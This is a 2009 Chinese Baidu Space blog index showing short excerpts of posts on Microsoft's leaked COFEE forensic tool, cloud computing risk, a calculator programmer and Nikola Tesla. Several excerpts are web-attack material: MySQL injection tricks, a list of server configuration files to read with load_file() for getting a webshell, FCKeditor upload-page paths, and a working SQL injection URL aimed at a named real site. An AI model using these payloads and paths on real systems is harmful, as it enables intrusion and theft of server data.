greyair's blog
百度空间 | 百度首页 
 
文章列表
 
2009-11-25 21:10

微软的一款名为COFEE的工具近日泄漏到网上,对于很多人来说这是一款非常陌生的微软产品,这是微软向国际刑警组织免费提供的证据提取工具,并不面向普通用户推广.COFEE全称为“计算机在线法庭科学证据提取器(Computer Online Forensic Evidence Extractor)”,微软是这样描述的COFEE的:“有了COFEE,没有合适的计算机取证能力的执法机构可以轻松、可靠而且高效地收集现场证据。   一个只有最基础的计算机知识的人也可以在不超过10分钟的时间里学会如何使用配置好的COFEE设备,执法人员可以像专家一

 
2009-11-25 21:06

index.php line 10

$data_name=get_date();  
  
... ...  
  
$from=$_SERVER["HTTP_REFERER"];  
  
... ...  
  
if(file_exists("$sys_data_dir/stat/$data_name.php"))

 
2009-11-25 20:54
    考虑到成本节省方面的巨大潜力,并且可以通过利用第三方的硬件基础设施的实现模式,无可否认,云计算是一个最新的热门话题。TechRepublic的讨论证明云计算在托管数据的所有权方面也会出现风险。

  尽管支持者并不认可这一点,但一份新的研究报告已经打开了这一话题的另一个范围。由加利福尼亚大学计算机科学与工程系的

 
2009-11-25 20:48

PS:我想黑客的精神真源于此吧。

      在本杰明?穆迪(Benjamin Moody)15岁那年,父亲为了帮助儿子学数学给他买了台计算器,穆迪一下子就迷上了它。他把计算器珍藏起来,津津有味地研究起了总共19章的使用说明。

不久以后,他就在自己那台由德州仪器公司(Texas Instruments Inc.)生产的图形计算器里编写了一个打地鼠游戏(Whac-A-Mole)程序。几个月后,他又编写出了一个能在计算器1.5英寸×2.5英寸屏幕上标出星辰位置的程序。他还曾把计算器变成了电子书阅读器,尽管一次只能读上几行

 
2009-11-20 07:24

尼古拉·特斯拉

在某人博客上看到的。。。百度搜索了一下。

果然是神一样的科学家。膜拜中。。。

 
2009-11-19 06:26

 
2009-11-17 22:10
前言
之前在《mysql下读取文件的几种方式及应用》一文中提到在mysql注入中理论上应该可以导出可执行二进制文件到启动项的说法,现给出原理及实例供大家参考。
MYSQL注入中导出文件需满足的条件大家都知道,就不多说了,要导出可执行二进制文件还需注入点必须存在二进制编码格式数据类型的字段(如BLOB或LONGBLOB数据类型)。要导出可执行bat文件对字段的数据类型没有要求。其他一些附加限制条件依环境而定。
在注入页面无法爆出物理路径的情况下,如果满足上述条件
 
2009-11-17 06:06

MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
/etc/httpd/conf/httpd.conf // apache配置文件
/etc/rsyncd.conf //同步程序配置文件
/etc/sysconfi

 
2009-11-17 05:35

ewebeditor.asp?action=stylepreview&id=14

Fckeditor版本多..支持很多语言..所以本文不针对任何版本或者什么语言.只讲利用方法

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.Asp

当你知道fckeditor目录时..你输入以上地址..就会看到有个上传的地方..如图所示:


 
2009-11-13 00:27

影响版本:
MyWeb 5.0
MyWeb 7.0

漏洞描述:
在”include”目录下,文件web_content.php文件对变量Id提交的参数没有过滤,导致存在注入漏洞。
http://www.nuanyue.com/include/web_content.php?id=80 and 1=2 union select 1,2,concat(user()),4,5,6,7,8,9,10,11,12,13–

 
     
 
 
个人档案
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
     
 
最新评论
 
     
 
好友最新文章
 
     
 
最近访客
 
 

Squnicg

巫山上云雨

1962112900

iceboy_

335711057

Dasparion

lixiaodaoaaa

topbesthacker
     
 
订阅我的空间
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu